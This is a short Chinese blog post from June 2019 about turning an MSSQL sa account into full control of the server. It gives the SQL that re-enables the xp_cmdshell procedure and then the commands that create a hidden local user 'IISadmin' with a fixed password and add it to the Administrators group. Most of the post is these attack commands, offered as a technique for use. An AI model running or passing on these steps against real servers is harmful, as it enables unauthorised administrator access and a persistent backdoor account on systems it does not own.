Jun
28
2019
MSSQL的SA账户提权获取服务器权限
这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它
尝试用正常的方法打开xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC sp_configure
如图xp_cmdshell 开启成功
接下来添加用户
EXEC xp_cmdshell 'net user IISadmin Qwer123456789 /add' EXEC xp_cmdshell 'net user IISadmin /active:yes' EXEC xp_cmdshell 'net localgroup administrators IISadmin /add'
最活跃的读者